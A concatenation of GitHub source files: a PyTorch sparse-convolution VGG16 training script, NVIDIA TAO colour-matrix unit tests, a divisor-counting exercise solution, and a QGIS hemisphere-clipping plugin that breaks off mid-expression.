forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.layer5(out)\n out = self.layer6(out)\n out = self.layer7(out)\n out = self.layer8(out)\n out = self.layer9(out)\n out = self.layer10(out)\n out = self.layer11(out)\n out = self.layer12(out)\n out = self.layer13(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.fc1(out)\n out = self.fc2(out)\n return out\n #Required only for benchmark Conv2d vs SparseConv\n def setSparseConvUsage(self,usage=True):\n self.layer1[0].use_sparse = usage\n self.layer2[0].use_sparse = usage\n self.layer3[0].use_sparse = usage\n self.layer4[0].use_sparse = usage\n self.layer5[0].use_sparse = usage\n self.layer6[0].use_sparse = usage\n self.layer7[0].use_sparse = usage\n self.layer8[0].use_sparse = usage\n self.layer9[0].use_sparse = usage\n self.layer10[0].use_sparse = usage\n self.layer11[0].use_sparse = usage\n self.layer12[0].use_sparse = usage\n self.layer13[0].use_sparse = usage\n\n def make_weights_sparse(self):\n '''\n Allow the convolution to compute the sparse representation of the weights\n '''\n self.layer1[0].load()\n self.layer2[0].load()\n self.layer3[0].load()\n self.layer4[0].load()\n self.layer5[0].load()\n self.layer6[0].load()\n self.layer7[0].load()\n self.layer8[0].load()\n self.layer9[0].load()\n self.layer10[0].load()\n self.layer11[0].load()\n self.layer12[0].load()\n self.layer13[0].load()\ndef load_datasets(BATCH_SIZE):\n '''\n Here we load and prepare the data, just a simple resize should\n be enough\n '''\n transf = transforms.Compose([transforms.Resize((32, 32)), transforms.ToTensor()])\n\n # download and create datasets\n train_dataset = datasets.MNIST(root='mnist_data',\n train=True,\n transform=transf,\n download=True)\n\n valid_dataset = datasets.MNIST(root='mnist_data',\n train=False,\n transform=transf)\n\n train_loader = DataLoader(dataset=train_dataset,\n batch_size=BATCH_SIZE,\n shuffle=True)\n\n valid_loader = DataLoader(dataset=valid_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False)\n\n return train_dataset, valid_dataset, train_loader, valid_loader\n\n\ntrain_dataset, valid_dataset, train_loader, valid_loader = load_datasets(BATCH_SIZE=128)\n\nN_CLASSES = 10\nLEARNING_RATE = 0.001\nSPARSITY_LEVEL = 0.5 #TODO (Integrate into the train function)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nTRAIN_CONSTANTS.device = device\nprint(f\"DEVICE IN USE{device}\")\n\nmodel = VGG16(N_CLASSES,sparse_conv_flag=False)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=0.9)\n\n#Step1. Train the model in the classic way:\ntrain_model(model,train_loader,criterion,optimizer,1,warm_up=0,print_frequency=100,pruning_routine=applyDummyPruningRoutine)\ngolden_model = copy.deepcopy(model) #Copy the classic model\n\n#Step2. FineTune the model using pruning at each epoch (USE FIP + regroup)\nmodel = copy.deepcopy(golden_model)\ntrain_model(model,train_loader,criterion,optimizer,2,warm_up=0,print_frequency=100,pruning_routine=applyPruningRegroup)\nrefill_model = copy.deepcopy(model) #Copy the regroup model\n\n\n#Step3. FineTune the model using pruning at each epoch (USE FIP + refill)\nmodel = copy.deepcopy(golden_model)\ntrain_model(golden_model,train_loader,criterion,optimizer,2,warm_up=0,print_frequency=100,pruning_routine=applyPruningRefill)\nrefill_model = copy.deepcopy(model) #Copy the refill model\n\n#Step4. Compare Golden vs Refill vs Regroup","repo_name":"NicolaDean/sparse-conv_regroup_pytorch","sub_path":"SparseConv/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611378461","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pytest\nfrom six.moves import mock, xrange\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.core.processors.augment import color\nfrom nvidia_tao_tf1.core.processors.augment.testing_utils import (\n assert_truncated_normal_distribution,\n assert_uniform_distribution,\n sample_tensors,\n)\nfrom nvidia_tao_tf1.core.utils import set_random_seed\n\nNUM_SAMPLES = 1000\n\n\ndef tile_color_matrix(ctm, batch_size):\n \"\"\"Tile a color matrix batch_size number of times.\"\"\"\n if batch_size is None:\n return ctm\n return np.tile(np.reshape(ctm, [1, 4, 4]), [batch_size, 1, 1])\n\n\ndef identity_color_matrix(batch_size):\n \"\"\"Return a batched identity matrix.\"\"\"\n ctm = np.eye(4, dtype=np.float32)\n return tile_color_matrix(ctm, batch_size)\n\n\n@pytest.fixture(scope=\"module\")\ndef get_random_image(batch_size, start=0.0, stop=1.0):\n \"\"\"Create a batch of images, with values within a linspace, that are then randomly shuffled.\"\"\"\n shape = (batch_size, 16, 64, 3)\n images = np.linspace(start, stop, batch_size * 3072, dtype=np.float32).reshape(\n shape\n )\n return np.random.permutation(images)\n\n\noffset_tests = [(0.0, 0.0, 0.0), (1.0, 1.0, 1.0), (-1.0, -1.0, -1.0), (0.1, 0.2, 0.3)]\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"offset\", offset_tests)\ndef test_brightness_offset_matrix(batch_size, offset):\n \"\"\"Test the brightness offset matrix, by checking it's an identity matrix with offsets.\"\"\"\n if batch_size is not None:\n offset = np.tile(offset, [batch_size, 1])\n m = color.brightness_offset_matrix(offset)\n m_np = tf.compat.v1.Session().run(m)\n if batch_size is not None:\n assert m_np.shape == (batch_size, 4, 4)\n created_offsets = m_np[:, 3, 0:3]\n else:\n assert m_np.shape == (4, 4)\n created_offsets = m_np[3, 0:3]\n\n # Test the validity of the offsets\n np.testing.assert_allclose(\n offset,\n created_offsets,\n rtol=1e-6,\n err_msg=\"Offset matrix contains different offset values than those \"\n \"supplied.\",\n )\n\n # Test the rest of the matrix is untouched (identity)\n # Zero out the offests, so we can test versus an identity matrix.\n if batch_size is not None:\n m_np[:, 3, 0:3] = 0.0\n else:\n m_np[3, 0:3] = 0.0\n expected = identity_color_matrix(batch_size)\n np.testing.assert_allclose(\n expected,\n m_np,\n rtol=1e-6,\n err_msg=\"Brightness offset matrix introduced non-identity values \"\n \"in elements other than the expected offsets.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_brightness_offset_matrix2(batch_size):\n \"\"\"Test that brightness offset matrix matches expected value.\"\"\"\n if batch_size is None:\n r = 0.5\n g = 1.0\n b = 1.5\n offset = [r, g, b]\n expected_ctm = np.array(\n [\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 1.0, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0],\n [r, g, b, 1.0],\n ]\n )\n else:\n r = np.linspace(-0.5, 0.5, batch_size)\n g = np.linspace(-1.0, 1.0, batch_size)\n b = np.linspace(-1.5, 1.5, batch_size)\n offset = np.transpose(np.array([r, g, b]))\n\n zero = np.zeros_like(r)\n one = np.ones_like(zero)\n expected_ctm = np.array(\n [\n [one, zero, zero, zero],\n [zero, one, zero, zero],\n [zero, zero, one, zero],\n [r, g, b, one],\n ]\n )\n # Swap the batch dimension first.\n expected_ctm = np.transpose(expected_ctm, [2, 0, 1])\n\n m = color.brightness_offset_matrix(offset)\n m_np = tf.compat.v1.Session().run(m)\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Brightness offset matrix does not match expected value.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"contrast\", [-0.5, 0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"center\", [1.0 / 2.0, 255.0 / 2.0])\ndef test_contrast_matrix(batch_size, contrast, center):\n \"\"\"Test the contrast matrix.\"\"\"\n zero_contrast = contrast == 0.0\n\n if batch_size is not None:\n contrast = np.tile(contrast, [batch_size])\n center = np.tile(center, [batch_size])\n\n m = color.contrast_matrix(contrast=contrast, center=center)\n m_np = tf.compat.v1.Session().run(m)\n\n if zero_contrast:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n m_np,\n rtol=1e-6,\n err_msg=\"Zero contrast did not result in the identity matrix.\",\n )\n\n if batch_size is not None:\n assert m_np.shape == (batch_size, 4, 4)\n m = m_np[0]\n else:\n assert m_np.shape == (4, 4)\n m = m_np\n bias = np.unique(m[3, 0:3])\n scale = np.unique([m[0, 0], m[1, 1], m[2, 2]])\n assert len(scale) == 1, \"Contrast scale is different across channels.\"\n assert len(bias) == 1, \"Contrast bias is different across channels.\"\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_contrast_matrix2(batch_size):\n \"\"\"Test that contrast matrix matches expectation.\"\"\"\n if batch_size is None:\n contrast = 1.5\n center = 0.5\n else:\n contrast = np.linspace(0.0, 2.0, batch_size)\n center = np.linspace(-1.0, 1.0, batch_size)\n\n m = color.contrast_matrix(contrast=contrast, center=center)\n m_np = tf.compat.v1.Session().run(m)\n\n zero = np.zeros_like(contrast)\n one = np.ones_like(contrast)\n scale = one + contrast\n bias = -contrast * center\n expected_ctm = np.array(\n [\n [scale, zero, zero, zero],\n [zero, scale, zero, zero],\n [zero, zero, scale, zero],\n [bias, bias, bias, one],\n ]\n )\n if batch_size is not None:\n # Swap the batch dimension first.\n expected_ctm = np.transpose(expected_ctm, [2, 0, 1])\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Contrast matrix does not match expected value.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"hue\", [0.0, 360.0])\n@pytest.mark.parametrize(\"saturation\", [0.0, 1.0])\ndef test_hue_saturation_matrix(batch_size, hue, saturation):\n \"\"\"\n Test the hue and saturation matrix.\n\n The tests are quite tolerant because a perfect HSV conversion cannot be done with a linear\n matrices. For more information, review the docs of the method.\n \"\"\"\n check_identity = hue in [0.0, 360.0] and saturation == 1.0\n zero_saturation = saturation == 0.0\n\n if batch_size is not None:\n hue = np.tile(hue, [batch_size])\n saturation = np.tile(saturation, [batch_size])\n\n m = color.hue_saturation_matrix(hue=hue, saturation=saturation)\n m_np = tf.compat.v1.Session().run(m)\n\n if batch_size is None:\n assert m_np.shape == (4, 4)\n else:\n assert m_np.shape == (batch_size, 4, 4)\n\n if check_identity:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n m_np,\n atol=1e-2,\n err_msg=\"No hue and saturation changed did not result in the \"\n \"identity matrix.\",\n )\n\n # Zero saturation should result in equal weighting of all channels\n if zero_saturation:\n for c in range(1, 3):\n # Compare the 2nd and 3rd channel with the first.\n if batch_size is not None:\n m0 = m_np[:, 0:3, 0]\n mc = m_np[:, 0:3, c]\n else:\n m0 = m_np[0:3, 0]\n mc = m_np[0:3, c]\n np.testing.assert_array_equal(\n m0,\n mc,\n err_msg=\"Zero saturation resulted in differences across \" \"channels.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_hue_saturation_matrix2(batch_size):\n \"\"\"Test that hue and saturation matrix matches expected value.\"\"\"\n if batch_size is None:\n hue = 45.0\n saturation = 1.0\n else:\n hue = np.linspace(0.0, 360.0, batch_size)\n saturation = np.linspace(0.0, 2.0, batch_size)\n\n m = color.hue_saturation_matrix(hue=hue, saturation=saturation)\n m_np = tf.compat.v1.Session().run(m)\n\n const_mat = np.array(\n [\n [0.299, 0.299, 0.299, 0.0],\n [0.587, 0.587, 0.587, 0.0],\n [0.114, 0.114, 0.114, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ],\n dtype=np.float32,\n )\n sch_mat = np.array(\n [\n [0.701, -0.299, -0.300, 0.0],\n [-0.587, 0.413, -0.588, 0.0],\n [-0.114, -0.114, 0.886, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ],\n dtype=np.float32,\n )\n ssh_mat = np.array(\n [\n [0.168, -0.328, 1.25, 0.0],\n [0.330, 0.035, -1.05, 0.0],\n [-0.497, 0.292, -0.203, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ],\n dtype=np.float32,\n )\n\n angle = hue * (np.pi / 180.0)\n\n if batch_size is not None:\n const_mat = np.tile(const_mat, [batch_size, 1, 1])\n sch_mat = np.tile(sch_mat, [batch_size, 1, 1])\n ssh_mat = np.tile(ssh_mat, [batch_size, 1, 1])\n angle = np.reshape(angle, [batch_size, 1, 1])\n saturation = np.reshape(saturation, [batch_size, 1, 1])\n\n expected_ctm = const_mat + saturation * (\n np.cos(angle) * sch_mat + np.sin(angle) * ssh_mat\n )\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Hue and saturation matrix does not match expected value.\",\n )\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=lambda h, s: (h, s),\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"hue_rotation_max\", [0.0, 100.0])\n@pytest.mark.parametrize(\"saturation_shift_max\", [0.0, 0.5])\n@pytest.mark.parametrize(\"hue_center\", [0.0, 50.0])\n@pytest.mark.parametrize(\"saturation_shift_min\", [-100.0, 0.0, None])\ndef test_random_hue_saturation_matrix(\n patched,\n batch_size,\n hue_rotation_max,\n saturation_shift_max,\n hue_center,\n saturation_shift_min,\n):\n \"\"\"Test that random_hue_saturation_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n tensors = color.random_hue_saturation_matrix(\n hue_rotation_max,\n saturation_shift_max,\n batch_size=batch_size,\n hue_center=hue_center,\n saturation_shift_min=saturation_shift_min,\n )\n hue_rotations, saturation_shifts = sample_tensors(tensors, NUM_SAMPLES)\n\n assert_truncated_normal_distribution(\n hue_rotations, mean=hue_center, stddev=hue_rotation_max / 2.0\n )\n\n if saturation_shift_min is None:\n saturation_shift_min = -saturation_shift_max\n\n min_bound = 1.0 + saturation_shift_min\n max_bound = 1.0 + saturation_shift_max\n assert_uniform_distribution(saturation_shifts, min_bound, max_bound)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.color.tf.random.truncated_normal\")\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=color.hue_saturation_matrix,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\ndef test_random_hue_saturation_matrix_samples_hue(\n mocked_hue_saturation_matrix, mocked_truncated_normal, batch_size\n):\n hue = tf.constant(42, dtype=tf.float32)\n mocked_truncated_normal.return_value = hue\n color.random_hue_saturation_matrix(\n hue_rotation_max=180.0, saturation_shift_max=0.0, batch_size=batch_size\n )\n\n expected_shape = [] if batch_size is None else [batch_size]\n mocked_truncated_normal.assert_called_with(expected_shape, mean=0.0, stddev=90.0)\n mocked_hue_saturation_matrix.assert_called_with(hue, mock.ANY)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.color.tf.random.uniform\")\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=color.hue_saturation_matrix,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\ndef test_random_hue_saturation_matrix_samples_saturation(\n mocked_hue_saturation_matrix, mocked_random_uniform, batch_size\n):\n saturation = 0.42\n mocked_random_uniform.return_value = saturation\n color.random_hue_saturation_matrix(\n hue_rotation_max=0.0, saturation_shift_max=0.5, batch_size=batch_size\n )\n expected_shape = [] if batch_size is None else [batch_size]\n mocked_random_uniform.assert_called_with(expected_shape, minval=-0.5, maxval=0.5)\n mocked_hue_saturation_matrix.assert_called_with(mock.ANY, 1 + saturation)\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.contrast_matrix\",\n side_effect=lambda c, cs: (c, cs),\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"contrast_scale_max\", [0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"contrast_center\", [1.0 / 2.0, 255.0 / 2.0])\n@pytest.mark.parametrize(\"contrast_scale_center\", [0.0, 0.5, 1.0])\ndef test_random_contrast_matrix(\n patched, batch_size, contrast_scale_max, contrast_center, contrast_scale_center\n):\n \"\"\"Test that random_contrast_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n contrast_scale_tensor, contrast_center_value = color.random_contrast_matrix(\n contrast_scale_max,\n contrast_center,\n batch_size=batch_size,\n scale_center=contrast_scale_center,\n )\n contrast_scales = sample_tensors([contrast_scale_tensor], NUM_SAMPLES)\n\n assert_truncated_normal_distribution(\n contrast_scales, mean=contrast_scale_center, stddev=contrast_scale_max / 2.0\n )\n\n assert contrast_center == contrast_center_value\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.brightness_offset_matrix\",\n side_effect=lambda offset: offset,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"brightness_scale_max\", [0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"brightness_uniform_across_channels\", [True, False])\n@pytest.mark.parametrize(\"brightness_center\", [-0.5, 0.0, 0.5])\ndef test_random_brightness_matrix(\n patched,\n batch_size,\n brightness_scale_max,\n brightness_uniform_across_channels,\n brightness_center,\n):\n \"\"\"Test that random_brightness_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n brightness_scale_tensor = color.random_brightness_matrix(\n brightness_scale_max,\n brightness_uniform_across_channels,\n batch_size=batch_size,\n brightness_center=brightness_center,\n )\n\n brightness_scales = sample_tensors([brightness_scale_tensor], NUM_SAMPLES)\n brightness_scales = np.array(brightness_scales[0])\n\n assert_truncated_normal_distribution(\n brightness_scales, mean=brightness_center, stddev=brightness_scale_max / 2.0\n )\n\n if brightness_uniform_across_channels:\n # If ``brightness_uniform_across_channels`` is True, check that values for each channel\n # match. This is done by subtracting value of red channel from all channels and checking\n # that result is zero.\n if batch_size is None:\n assert all(\n [\n np.allclose(brightness_scales[i, :] - brightness_scales[i, 0], 0.0)\n for i in xrange(len(brightness_scales))\n ]\n )\n else:\n for b in xrange(len(brightness_scales)):\n assert all(\n [\n np.allclose(\n brightness_scales[b, i, :] - brightness_scales[b, i, 0], 0.0\n )\n for i in xrange(len(brightness_scales[b]))\n ]\n )\n elif brightness_scale_max > 0.0:\n # If ``brightness_uniform_across_channels`` is False, check that values for each channel\n # match. This is done by negating test for ``brightness_uniform_across_channels`` True.\n # Note that we're not checking value of red channel after subtracting value of red channel\n # since that will be always zero. Similarly, values will be all zero and hence the same\n # if ``brightness_scale_max`` == 0.0.\n if batch_size is None:\n assert all(\n [\n not np.allclose(\n brightness_scales[i, 1:] - brightness_scales[i, 0], 0.0\n )\n for i in xrange(len(brightness_scales))\n ]\n )\n else:\n for b in xrange(len(brightness_scales)):\n assert all(\n [\n not np.allclose(\n brightness_scales[b, i, 1:] - brightness_scales[b, i, 0],\n 0.0,\n )\n for i in xrange(len(brightness_scales[b]))\n ]\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\n \"hue_rotation_max, saturation_shift_max, contrast_scale_max, \"\n \"brightness_scale_max, brightness_uniform_across_channels\",\n [\n (0, 0, 0, 0, True),\n (0, 0, 0, 0, False),\n (0, 0, 0, 0.5, True),\n (0, 0, 0, 0.5, False),\n ],\n)\ndef test_get_random_color_transformation_matrix(\n batch_size,\n hue_rotation_max,\n saturation_shift_max,\n contrast_scale_max,\n brightness_scale_max,\n brightness_uniform_across_channels,\n):\n \"\"\"\n Test generate random color transform matrix.\n \"\"\"\n set_random_seed(42)\n # No linter approved way to break up the brightness_uniform_across_channels=\n # brightness_uniform_across_channels line and maintain indentation, so using\n # a dummy variable.\n uniform_bright = brightness_uniform_across_channels\n ctm = color.get_random_color_transformation_matrix(\n hue_rotation_max=hue_rotation_max,\n saturation_shift_max=saturation_shift_max,\n contrast_scale_max=contrast_scale_max,\n contrast_center=0.5,\n brightness_scale_max=brightness_scale_max,\n brightness_uniform_across_channels=uniform_bright,\n batch_size=batch_size,\n )\n ctm_np = tf.compat.v1.Session().run(ctm)\n if brightness_scale_max > 0:\n if batch_size is None:\n ctm = ctm_np[3, 0:3]\n else:\n ctm = ctm_np[:, 3, 0:3]\n if brightness_uniform_across_channels:\n # Tests that the first three values in the last row of the transform matrix\n # (the offset channels) have the same value.\n np.testing.assert_allclose(\n np.sum(np.diff(ctm)),\n 0,\n atol=1e-2,\n err_msg=\"color transform matrix is not correctly \"\n \"generated when brightness is uniform.\",\n )\n else:\n # Tests that the first three values in the last row of the transform matrix\n # (the offset channels) have different values.\n np.testing.assert_equal(\n np.not_equal(np.sum(np.diff(ctm)), 0),\n True,\n err_msg=\"color transform matrix is not correctly \"\n \"generated when brightness is not uniform.\",\n )\n else:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n ctm_np,\n atol=1e-2,\n err_msg=\"color transform matrix is not correctly generated.\",\n )\n\n\ndef test_no_op_color_transform():\n \"\"\"Tests that supplying no kwargs results in an almost-no-op color transformation matrix.\"\"\"\n ctm = color.get_random_color_transformation_matrix()\n ctm_np = tf.compat.v1.Session().run(ctm)\n # 'Almostness' comes from saturation matrix.\n np.testing.assert_allclose(\n ctm_np,\n np.eye(4),\n atol=2e-3,\n verbose=True,\n err_msg=\"Default color transformation matrix is too 'far' from the identity matrix.\",\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/processors/augment/test_color_matrices.py","file_name":"test_color_matrices.py","file_ext":"py","file_size_in_byte":20129,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"35589508386","text":"def divisors(i, A_set,A_dict):\n #print \"i = \", i\n list_len = 0\n for a in range(1, int(i ** .5) + 1):\n #print \"a = \", a\n if i %a == 0:\n #print \"found divisor\"\n if a in A_set:\n #print \"found in list\"\n list_len += A_dict[a]\n if i / a != a:\n #print \"found 2nd divisor\"\n if i / a in A_set:\n list_len += A_dict[i / a]\n #print \"list_len = \", list_len\n return list_len\n \n \ndef solution(A):\n # write your code in Python 2.7\n A_set = set(A)\n A_dict = {}\n div_dict = {}\n A_len = len(A)\n for item in A:\n if item in A_dict:\n A_dict[item] += 1\n else:\n A_dict[item] = 1\n out = []\n for item in A:\n if item in div_dict:\n difference_len = div_dict[item]\n else:\n difference_len = divisors(item,A_set, A_dict)\n div_dict[item] = difference_len\n count = 0\n #for i in difference_set:\n # count += A_dict[i]\n out.append(A_len - difference_len)\n return out\n\n","repo_name":"agileminor/shared_files","sub_path":"exercises/count_non_div.py","file_name":"count_non_div.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19314618227","text":"__author__ = 'Juernjakob Dugge'\n__date__ = 'September 2020'\n__copyright__ = '(C) 2020, Juernjakob Dugge'\n\nimport os\n\nfrom qgis.core import (\n QgsApplication,\n QgsProcessing,\n QgsProcessingParameterFeatureSource,\n QgsProcessingParameterNumber,\n QgsProcessingProvider,\n QgsCoordinateReferenceSystem,\n QgsVectorLayer,\n QgsFeature,\n QgsGeometry,\n QgsCoordinateTransform,\n QgsPointXY,\n QgsProject,\n QgsProcessingParameterVectorDestination\n)\n\nfrom processing.algs.qgis.QgisAlgorithm import QgisAlgorithm\nimport processing\nimport numpy as np\nimport cmath\n\npluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]\n\n\nclass ClipToHemisphereProvider(QgsProcessingProvider):\n \n def __init__(self):\n QgsProcessingProvider.__init__(self)\n \n def unload(self):\n pass\n \n def loadAlgorithms(self):\n self.addAlgorithm(ClipToHemisphereAlgorithm())\n \n def id(self):\n \"\"\"\n Returns the unique provider id, used for identifying the provider. This\n string should be a unique, short, character only string, eg \"qgis\" or\n \"gdal\". This string should not be localised.\n \"\"\"\n return 'Clip to hemisphere'\n \n def name(self):\n \"\"\"\n Returns the provider name, which is used to describe the provider\n within the GUI.\n\n This string should be short (e.g. \"Lastools\") and localised.\n \"\"\"\n return self.tr('Clip to hemisphere')\n \n def longName(self):\n \"\"\"\n Returns the a longer version of the provider name, which can include\n extra details such as version numbers. E.g. \"Lastools LIDAR tools\n (version 2.2.1)\". This string should be localised. The default\n implementation returns the same string as name().\n \"\"\"\n return self.name()\n\n\nclass ClipToHemispherePlugin(object):\n def __init__(self):\n self.provider = None\n \n def initProcessing(self):\n self.provider = ClipToHemisphereProvider()\n QgsApplication.processingRegistry().addProvider(self.provider)\n \n def initGui(self):\n self.initProcessing()\n \n def unload(self):\n QgsApplication.processingRegistry().removeProvider(self.provider)\n\n\nclass ClipToHemisphereAlgorithm(QgisAlgorithm):\n INPUT = 'INPUT'\n OUTPUT = 'OUTPUT'\n CENTER_LATITUDE = 'CENTER_LATITUDE'\n CENTER_LONGITUDE = 'CENTER_LONGITUDE'\n SEGMENTS = 'SEGMENTS'\n \n def __init__(self):\n super().__init__()\n \n def initAlgorithm(self, config=None):\n self.addParameter(\n QgsProcessingParameterFeatureSource(\n self.INPUT,\n self.tr('Input layer'),\n [QgsProcessing.TypeVectorAnyGeometry]\n )\n )\n \n self.addParameter(\n QgsProcessingParameterVectorDestination(\n self.OUTPUT,\n self.tr('Output layer')\n )\n )\n \n param = QgsProcessingParameterNumber(\n self.CENTER_LATITUDE,\n self.tr('Center latitude'),\n type=QgsProcessingParameterNumber.Double,\n minValue=-90,\n maxValue=90\n )\n param.setMetadata({'widget_wrapper':\n {'decimals': 1}\n })\n self.addParameter(param)\n \n param = QgsProcessingParameterNumber(\n self.CENTER_LONGITUDE,\n self.tr('Center longitude'),\n type=QgsProcessingParameterNumber.Double,\n minValue=-180,\n maxValue=180\n )\n param.setMetadata({'widget_wrapper':\n {'decimals': 1}\n })\n self.addParameter(param)\n \n self.addParameter(QgsProcessingParameterNumber(\n self.SEGMENTS,\n self.tr('Segments'),\n defaultValue=720,\n minValue=3,\n type=QgsProcessingParameterNumber.Integer\n ))\n \n def name(self):\n return 'cliptohemisphere'\n \n def displayName(self):\n return self.tr('Clip to hemisphere')\n \n def processAlgorithm(self, parameters, context, feedback):\n source = self.parameterAsSource(parameters, self.INPUT, context)\n sourceCrs = source.sourceCrs()\n centerLatitude = self.parameterAsDouble(parameters,\n self.CENTER_LATITUDE, context)\n centerLongitude = self.parameterAsDouble(parameters,\n self.CENTER_LONGITUDE, context)\n segments = self.parameterAsInt(parameters, self.SEGMENTS, context)\n \n earthRadius = 6371000\n targetProjString = \"+proj=ortho +lat_0=\" + str(centerLatitude) + \\\n \" +lon_0=\" + str(centerLongitude) + \\\n \" +x_0=0 +y_0=0 +a=\" + str(earthRadius) + \\\n \" +b=\" + str(earthRadius) + \\\n \" +units=m +no_defs\"\n targetCrs = QgsCoordinateReferenceSystem()\n targetCrs.createFromProj(targetProjString)\n \n transformTargetToSrc = QgsCoordinateTransform(targetCrs,\n sourceCrs,\n QgsProject.instance()).transform\n transformSrcToTarget = QgsCoordinateTransform(sourceCrs,\n targetCrs,\n QgsProject.instance()).transform\n clipLayer = QgsVectorLayer(\"MultiPolygon\", \"clipLayer\", \"memory\")\n pr = clipLayer.dataProvider()\n \n # Handle edge cases:\n # Hemisphere centered on the equator\n if centerLatitude == 0:\n # Hemisphere centered on the equator and including the antimeridian\n if abs(centerLongitude) >= 90:\n edgeEast = -180 - np.sign(centerLongitude) * \\\n (180 - abs(centerLongitude)) + 90\n edgeWest = 180 - np.sign(centerLongitude) * \\\n (180 - abs(centerLongitude)) - 90\n circlePoints = [[\n [QgsPointXY(-180.01, latitude) for\n latitude in np.linspace(90, -90, segments // 8)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(-180, edgeEast, segments // 8)] +\n [QgsPointXY(edgeEast, latitude) for latitude in\n np.linspace(-90, 90, segments // 8)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(edgeEast, -180, segments // 8)]\n ],\n [\n [QgsPointXY(edgeWest, latitude) for latitude in\n np.linspace(90, -90, segments // 8)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(edgeWest, 180, segments // 8)] +\n [QgsPointXY(180.01, latitude) for\n latitude in np.linspace(-90, 90, segments // 8)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(180, edgeWest, segments // 8)]\n ]]\n # Hemisphere centered on the equator not including the antimeridian\n else:\n edgeWest = centerLongitude - 90\n edgeEast = centerLongitude + 90\n circlePoints = [[\n [QgsPointXY(edgeWest, latitude) for latitude in\n np.linspace(90, -90, segments // 4)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(edgeWest, edgeEast, segments // 4)] +\n [QgsPointXY(edgeEast, latitude) for\n latitude in np.linspace(-90, 90, segments // 4)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(edgeEast, edgeWest, segments // 4)]\n ]]\n # Hemisphere centered on one of the poles\n elif abs(centerLatitude) == 90:\n circlePoints = [[\n [QgsPointXY(-180.01, latitude) for latitude in\n np.linspace(45 + 0.5 * centerLatitude,\n -45 + 0.5 * centerLatitude,\n segments // 4)] +\n [QgsPointXY(longitude, -45 + 0.5 * centerLatitude)\n for longitude in\n np.linspace(-180, 180, segments // 4)] +\n [QgsPointXY(180.01, latitude) for latitude in\n np.linspace(-45 + 0.5 * centerLatitude,\n 45 + 0.5 * centerLatitude,\n segments // 4)] +\n [QgsPointXY(longitude, 45 + 0.5 * centerLatitude) for longitude\n in\n np.linspace(180, -180, segments // 4)]\n ]]\n # All other hemispheres\n else:\n # Create a circle in the orthographic projection, convert the\n # circle coordinates to the source CRS\n angles = np.linspace(0, 2 * np.pi, segments, endpoint=False)\n circlePoints = np.array([\n transformTargetToSrc(\n 